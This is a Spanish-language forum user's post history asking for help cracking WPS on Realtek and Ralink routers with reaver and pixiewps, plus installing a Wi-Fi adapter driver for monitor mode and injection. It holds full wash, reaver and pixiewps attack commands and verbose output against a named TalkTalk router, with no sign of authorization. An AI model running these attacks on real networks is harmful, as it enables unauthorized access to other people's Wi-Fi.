El libre pensamiento para un internet libre

No estas registrado.  

#1 Re: Preguntas generales y busqueda de nuevas brechas » Guía completa para principiantes "Crack WPS con reaver" » 18-12-2018 02:21:59

Hola a todos de nuevo , escribia esta vez para hacer la pregunta de si se sabe si todos los router modelos realtek son vulnerables a un ataque pixie dust porque he intentado muchas veces con ellos pero con ninguno obtuve tan si quiera el PIN , ya ni hablamos sobre la clave WPA , sin embargo me funciono con absolutamente todos los router modelo Ralink. Probe la opcion  --force y aun asi nada por lo que me pregutnaba si los fabricantes podrian haber parcheado a estas alturas ya sus modelos de router para los modelos realtek.

Ademas tendria otra consulta y es que cuando consigo hacer el ataque pixie dust de manera efectiva sobre un router ralink obtengo el PIN sin problemas pero a la hora de tratar de sacar la clave con la opcion -p (una vez obtenido el PIN) reaver se queda preguntando al router si se trata del PIN correcto pero parece como si el router no emitiera respuesta alguna solo se queda intentando una y otra vez ese mismo PIN .

Gracias por vuestro tiempo y en caso de necesitar informacion podria aportarla sin problemas. He de comentar que todos los router con los que he probado son de Inglaterra.

Un cordial saludo.

#2 Re: Noticias Kali linux, asesoramiento instalación y asuntos de compatibildades » Instalación rtl8812au (Alfa AWUSO36ACH) en kali linux "rolling" 2016.2 » 31-03-2018 19:58:52

Hola
Leyendo este foro me decidi a adquirir la AWUS036ACH e intente instalar los drivers de astsam pero al intentar instalarlos obtengo este error
al intentar ejecutar el comando make

[email protected]:~/rtl8812au# make
make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/4.14.0-kali3-amd64/build M=/root/rtl8812au  modules
make[1]: *** /lib/modules/4.14.0-kali3-amd64/build: No such file or directory.  Stop.
Makefile:1264: recipe for target 'modules' failed
make: *** [modules] Error 2

Alguna idea de como podria intentar instalar estos drivers?

Tambien probe con los drivers de diederikdehaas pero sigo obteniendo errores  y ademas me gustaria poder instalar los astsam puesto que me permitirian activar el modo monitor y la inyeccion de la AWUS036ACH

#3 Re: Preguntas generales y busqueda de nuevas brechas » Guía completa para principiantes "Crack WPS con reaver" » 19-03-2018 16:28:04

Gracias por hacerme saber cuales son la PKE Y LA PKR  dentro de todos esos datos , son los dos unicos que me hacen falta para reaizar el ataque de fuerza bruta , ahora, ¿crees que merecera la pena? al comentarme que no es vulnerable al pixiedust  ¿ Crees que debería realizar un ataque de fuerza bruta por pixiewps ?

Acerca del router TALKTALK lo que se es que se trata de un router de Inglaterra , se trata una compañia que podría compararse a Jazztel en España y que su router se trata de un realtek con un wps 2.0 mas alla de eso solo se la informacion que me da el reaver al hacer el ataque .

#4 Re: Preguntas generales y busqueda de nuevas brechas » Guía completa para principiantes "Crack WPS con reaver" » 19-03-2018 15:16:10

Aqui dejo la información que recopile con wash

[email protected]:~# wash -i wlan0mon -c 10 -j

Wash v1.6.3 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

"bssid" : "B0:89:00:XX:XX:XX", "essid" : "TALKTALK7B1623", "channel" : 10, "rssi" : -64, "vendor_oui" : "00E04C", "wps_version" : 32, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Realtek Semiconductor Corp.", "wps_model_name" : "RTL8xxx", "wps_model_number" : "EV-2010-09-20", "wps_device_name" : "ADSL Modem/Router", "wps_serial" : "123456789012347", "wps_uuid" : "63041253101920061228b089007b162c", "wps_selected_registrar" : "01", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "0680", "dummy": 

0

y aqui la informacion que me deja reaver

reaver -i wlan0mon -b B0:89:00:XX:XX:XX -c 10 -K 1 -Z -vvv

Reaver v1.6.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0mon to channel 10
[?] Restore previous session for B0:89:00:7B:16:2C? [n/Y] n
[+] Waiting for beacon from B0:89:00:7B:16:2C
[+] Received beacon from B0:89:00:7B:16:2C
[+] Vendor: RealtekS
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
[+] Associated with B0:89:00:7B:16:2C (ESSID: TALKTALK7B1623)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
WPS: Processing received message (len=436 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 b0 89 00 7b 16 2c
WPS: Enrollee MAC Address b0:89:00:7b:16:2c
WPS: Enrollee Nonce - hexdump(len=16): ff 43 d8 8a 60 4f 00 19 d6 1f 29 8b 24 04 67 29
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x680 [PBC]
WPS: Prefer PSK format key due to Enrollee not supporting display
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=27):
     52 65 61 6c 74 65 6b 20 53 65 6d 69 63 6f 6e 64   Realtek Semicond
     75 63 74 6f 72 20 43 6f 72 70 2e                  uctor Corp.     
WPS: Model Name - hexdump_ascii(len=7):
     52 54 4c 38 78 78 78                              RTL8xxx         
WPS: Model Number - hexdump_ascii(len=13):
     45 56 2d 32 30 31 30 2d 30 39 2d 32 30            EV-2010-09-20   
WPS: Serial Number - hexdump_ascii(len=15):
     31 32 33 34 35 36 37 38 39 30 31 32 33 34 37      123456789012347 
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=17):
     41 44 53 4c 20 4d 6f 64 65 6d 2f 52 6f 75 74 65   ADSL Modem/Route
     72                                                r               
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 10000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 0e 30 a8 6a a6 cc d7 94 86 20 66 52 2f ee 38 88
WPS: UUID-R - hexdump(len=16): 77 2b 15 7f 86 2f 89 62 3d 4c e9 5b 05 b9 6c 46
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 1a 5d 03 bf 06 0f 58 e0 f5 45 ef f6 a9 e4 df 32 6f 42 4b d3 31 ed 8b 45 60 05 32 4a 4d 00 55 08 90 c5 1b 44 c2 e8 32 95 cd 8e 24 c1 c4 f4 3c b7 c5 bc 04 82 4f 8a 8f 83 75 e9 55 44 43 5e e7 43 63 8d e9 47 dd 23 30 12 7e 90 a8 f9 12 83 49 8f 2e ce 58 2f 5d 2f 11 92 bd d3 b9 e5 95 e7 ba c0 a7 8f 8a 00 d7 50 46 6a a1 2d 14 df 92 0b 7a 75 d8 ea a1 b9 b8 2c ed f5 2d 6f b5 b5 9b 37 7e 69 6d bb 15 e0 14 fc 7d 51 81 15 65 75 b1 39 91 25 c0 26 f0 49 1f de 14 b2 08 25 6b 37 f7 a0 92 5f 94 35 fd cd de 07 55 6d f7 80 d3 50 a4 71 b5 84 1f cd 3b 16 72 3c 9b 7c 1c 61 20 cc c8 c0 ea 12
DH: public value - hexdump(len=192): 91 77 95 bf f6 2e ba 03 a4 51 e7 05 63 a5 08 c9 c9 8f 12 c5 ff e8 5e 69 a1 5a 52 b0 bd d2 d3 c5 6a 1e 0d 32 ca 12 7e 6e 06 17 16 13 c6 f1 29 a0 6e 0e 6e 2d 96 2c 2c 09 ec e1 f8 4c ed 03 79 ae 1e 59 a7 c5 46 f9 d8 ec 72 f9 d0 ed c6 75 23 52 b5 b0 b5 28 c5 df 5d 80 a9 30 c7 7c d1 e8 65 cf 1d a3 94 bb d2 2e a1 8a b2 cb 05 88 59 6e c2 02 16 04 31 a6 ba 81 4b be b1 ce e4 ca f0 29 0e 24 2e 97 df 95 8f 62 e9 7f f3 bc cc 9b 13 c3 b6 b6 24 b0 55 5c 03 3c cc b6 95 da fc 0c 13 4b af 0e 97 eb 52 02 bb 6f 2e ea 91 c3 13 eb 4f 29 f1 87 10 04 7e 6d ac af 00 1c c6 99 b1 f4 58 5d 9e 00
WPS: DH Private Key - hexdump(len=192): 1a 5d 03 bf 06 0f 58 e0 f5 45 ef f6 a9 e4 df 32 6f 42 4b d3 31 ed 8b 45 60 05 32 4a 4d 00 55 08 90 c5 1b 44 c2 e8 32 95 cd 8e 24 c1 c4 f4 3c b7 c5 bc 04 82 4f 8a 8f 83 75 e9 55 44 43 5e e7 43 63 8d e9 47 dd 23 30 12 7e 90 a8 f9 12 83 49 8f 2e ce 58 2f 5d 2f 11 92 bd d3 b9 e5 95 e7 ba c0 a7 8f 8a 00 d7 50 46 6a a1 2d 14 df 92 0b 7a 75 d8 ea a1 b9 b8 2c ed f5 2d 6f b5 b5 9b 37 7e 69 6d bb 15 e0 14 fc 7d 51 81 15 65 75 b1 39 91 25 c0 26 f0 49 1f de 14 b2 08 25 6b 37 f7 a0 92 5f 94 35 fd cd de 07 55 6d f7 80 d3 50 a4 71 b5 84 1f cd 3b 16 72 3c 9b 7c 1c 61 20 cc c8 c0 ea 12
WPS: DH own Public Key - hexdump(len=192): 91 77 95 bf f6 2e ba 03 a4 51 e7 05 63 a5 08 c9 c9 8f 12 c5 ff e8 5e 69 a1 5a 52 b0 bd d2 d3 c5 6a 1e 0d 32 ca 12 7e 6e 06 17 16 13 c6 f1 29 a0 6e 0e 6e 2d 96 2c 2c 09 ec e1 f8 4c ed 03 79 ae 1e 59 a7 c5 46 f9 d8 ec 72 f9 d0 ed c6 75 23 52 b5 b0 b5 28 c5 df 5d 80 a9 30 c7 7c d1 e8 65 cf 1d a3 94 bb d2 2e a1 8a b2 cb 05 88 59 6e c2 02 16 04 31 a6 ba 81 4b be b1 ce e4 ca f0 29 0e 24 2e 97 df 95 8f 62 e9 7f f3 bc cc 9b 13 c3 b6 b6 24 b0 55 5c 03 3c cc b6 95 da fc 0c 13 4b af 0e 97 eb 52 02 bb 6f 2e ea 91 c3 13 eb 4f 29 f1 87 10 04 7e 6d ac af 00 1c c6 99 b1 f4 58 5d 9e 00
WPS: DH Private Key - hexdump(len=192): 1a 5d 03 bf 06 0f 58 e0 f5 45 ef f6 a9 e4 df 32 6f 42 4b d3 31 ed 8b 45 60 05 32 4a 4d 00 55 08 90 c5 1b 44 c2 e8 32 95 cd 8e 24 c1 c4 f4 3c b7 c5 bc 04 82 4f 8a 8f 83 75 e9 55 44 43 5e e7 43 63 8d e9 47 dd 23 30 12 7e 90 a8 f9 12 83 49 8f 2e ce 58 2f 5d 2f 11 92 bd d3 b9 e5 95 e7 ba c0 a7 8f 8a 00 d7 50 46 6a a1 2d 14 df 92 0b 7a 75 d8 ea a1 b9 b8 2c ed f5 2d 6f b5 b5 9b 37 7e 69 6d bb 15 e0 14 fc 7d 51 81 15 65 75 b1 39 91 25 c0 26 f0 49 1f de 14 b2 08 25 6b 37 f7 a0 92 5f 94 35 fd cd de 07 55 6d f7 80 d3 50 a4 71 b5 84 1f cd 3b 16 72 3c 9b 7c 1c 61 20 cc c8 c0 ea 12
WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
DH: shared key - hexdump(len=192): a5 28 e1 f2 3c b3 2c 3a 56 93 33 0f ff 54 24 85 d6 c1 4d fd fe cc 32 90 2a d0 65 c5 f9 ca 6c 3a 86 d2 ef fe ab 83 28 29 a5 77 e1 7e 03 ba 76 38 43 e3 dc c0 15 1f 4a 3f 7f 65 bf b2 77 66 9d 85 24 0f 8f 9d 8a 8c 7e 1d 9d 7e ea f2 25 fe 65 b4 88 af f8 a4 ad 7e ab 66 2a 76 8a c3 59 ab 60 10 f1 3d f7 ab ac 6c 3d 7b e8 b1 66 4a b5 ad a8 2f 2f f1 64 22 d6 31 79 84 1f ba 5d 45 80 fe dc f0 de 31 d7 83 80 52 36 c6 0f b2 d3 8e d1 d8 29 6f 0c c1 0c ba fc b0 b9 fd 89 7b 4a c5 3a ff 02 33 18 ee cb 0c e5 66 41 f4 82 a3 45 31 38 e4 68 74 a9 24 8c 62 02 51 8d dd 42 f2 31 81 a0 3b 02 c2
WPS: DH shared key - hexdump(len=192): a5 28 e1 f2 3c b3 2c 3a 56 93 33 0f ff 54 24 85 d6 c1 4d fd fe cc 32 90 2a d0 65 c5 f9 ca 6c 3a 86 d2 ef fe ab 83 28 29 a5 77 e1 7e 03 ba 76 38 43 e3 dc c0 15 1f 4a 3f 7f 65 bf b2 77 66 9d 85 24 0f 8f 9d 8a 8c 7e 1d 9d 7e ea f2 25 fe 65 b4 88 af f8 a4 ad 7e ab 66 2a 76 8a c3 59 ab 60 10 f1 3d f7 ab ac 6c 3d 7b e8 b1 66 4a b5 ad a8 2f 2f f1 64 22 d6 31 79 84 1f ba 5d 45 80 fe dc f0 de 31 d7 83 80 52 36 c6 0f b2 d3 8e d1 d8 29 6f 0c c1 0c ba fc b0 b9 fd 89 7b 4a c5 3a ff 02 33 18 ee cb 0c e5 66 41 f4 82 a3 45 31 38 e4 68 74 a9 24 8c 62 02 51 8d dd 42 f2 31 81 a0 3b 02 c2
WPS: DHKey - hexdump(len=32): 41 05 20 fd d9 c3 f1 d4 e1 bb 29 27 74 9e b4 42 87 c0 a6 51 f0 f7 3f 1a f4 b3 8e 60 c3 9f 07 48
WPS: KDK - hexdump(len=32): 7b b8 a1 9e 35 ae d8 41 60 98 e5 91 03 40 b6 5f bf 9f ef 8a f4 f0 59 b5 65 06 f8 2a bf 75 89 4d
WPS: AuthKey - hexdump(len=32): 93 d1 56 42 26 40 32 5b f6 15 03 1e 80 99 13 78 ef d6 06 0b 6a af a0 b2 59 4a 8f 6a 2f 75 ee 0b
WPS: KeyWrapKey - hexdump(len=16): b7 3d 31 46 b2 b6 0f f0 58 fc 65 b6 42 4a 95 a5
WPS: EMSK - hexdump(len=32): 90 60 53 81 1b 9b a6 3e 86 84 10 27 48 b7 8f 37 59 73 71 f5 11 af 25 d6 a7 27 f7 4e 01 6f cf 5a
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 9a e6 c9 e2 82 90 db c7 f2 9f 30 72 7d 76 d0 5f 73 66 5b b6 6e dd 3d 57 13 22 82 53 42 c2 53 61
WPS: E-Hash2 - hexdump(len=32): 1b 43 22 ae e4 c2 9d e8 ab 15 69 45 18 34 e1 a7 90 8d 9a 1c 13 5c 3e 47 80 7c 28 0e 0c 2a dd 15
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 9ae6c9e28290dbc7f29f30727d76d05f73665bb66edd3d571322825342c25361 -z 1b4322aee4c29de8ab1569451834e1a7908d9a1c135c3e47807c280e0c2add15 -a 93d156422640325bf615031e80991378efd6060b6aafa0b2594a8f6a2f75ee0b -n ff43d88a604f0019d61f298b24046729 -r 917795bff62eba03a451e70563a508c9c98f12c5ffe85e69a15a52b0bdd2d3c56a1e0d32ca127e6e06171613c6f129a06e0e6e2d962c2c09ece1f84ced0379ae1e59a7c546f9d8ec72f9d0edc6752352b5b0b528c5df5d80a930c77cd1e865cf1da394bbd22ea18ab2cb0588596ec202160431a6ba814bbeb1cee4caf0290e242e97df958f62e97ff3bccc9b13c3b6b624b0555c033cccb695dafc0c134baf0e97eb5202bb6f2eea91c313eb4f29f18710047e6dacaf001cc699b1f4585d9e00

 Pixiewps 1.4

 [-] WPS pin not found!

  Time taken: 0 s 86 ms

Como podeis observar no me da los datos sobre el pke o pkr o no los consigo ver en ningun lado ...

Gracias por vuestra ayuda de nuevo. Espero haber recopilado los datos como me pedistes kcdtv  .

#5 Re: Preguntas generales y busqueda de nuevas brechas » Guía completa para principiantes "Crack WPS con reaver" » 19-03-2018 04:09:23

Buenas de nuevo , hice lo que me recomendastes para realizar el ataque de fuerza bruta desde pixiewps por lo que inicie el ataque de reaver para obtener los 5 valores (pke, pkr , e hash 1 , e hash 2 , authkey y e-nonce ) pero solo obtuve uno de ellos y los otros los supuse del ataque pixiewps que se ejecuta automaticamente en el ataque reaver como se puede ver en la imagen.

mini_wifilibre_20180318-1735.jpeg

Intente buscar esos 5 valores tambien al realizar el ataque reaver en la parte de informacion del router pero no conseguí ver nada como muestro aquí

ataque-reaver-2.jpeg

Entonces intenté ejecutar yo mismo con los valores que pude sacar a traves del ataque pixiewps y añadiendo el valor -f (para el brutal force) pero como muestro en la ultima imagen sigue no encontrando el pin pero claro el tiempo que tarda en darme la respuesta es de segundos y no de media hora (aproximada) que es la que vi en tu tutorial.

mini_pixiewps-ataque.jpeg

Disculpad por las molestias ocasionadas y muchas gracias por la ayuda porque me encuentro un poco perdido en este momento.

Un saludo.

ataque-reaver-1.jpeg

Aqui dejo el ataque reaver donde vi los parametros del ataque automatico de pixiewps al realizar el reaver (donde pude ver los 5 elementos para realizar el pixiewps manual y con fuerza bruta )

Aquí la otra imagen del ataque pixiewps manual que intente con fuerza bruta pero que tan solo dura lo que se puede ver en la imagen.

pixiewps-ataque.jpeg

#6 Re: Preguntas generales y busqueda de nuevas brechas » Guía completa para principiantes "Crack WPS con reaver" » 18-03-2018 20:59:09

ante todo gracias por tu respuesta. ¿Podrías mostrarme como quedaría la línea? seria algo como....sudo reaver -i wlan0mon -b (bssid) -c(channel) -K 1 --force -Z -vvv...

Gracias por tu paciencia y amabilidad .

#7 Re: Preguntas generales y busqueda de nuevas brechas » Guía completa para principiantes "Crack WPS con reaver" » 18-03-2018 16:42:45

Primero de todo un placer estar en esta comunidad.
Escribía porque este foro me ayudo bastante en mis conocimientos sobre el WPS pero encuentro una parte en la que no se porque no me deja hacer la parte de fuerza bruta
Pin not found despues de no coger el PIN .

¿Que es lo que pasa? . Me gustaria seguir probando con la fuerza bruta pero no me da la opción , es un realtek WPS 2.0.

manual_crack_wps_16.jpg  -- > hasta ahi es donde me gustaria llegar.

Muchas gracias y un saludo a todos.

Pie de página

Información del usuario

Ultimo usuario registrado: Emzor
Usuarios registrados conectados: 0
Invitados conectados: 6

Estadisticas de los foros

Número total de usuarios registrados: 1,731
Número total de temas: 1,371
Número total de mensajes: 13,758

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36
Impulsado por FluxBB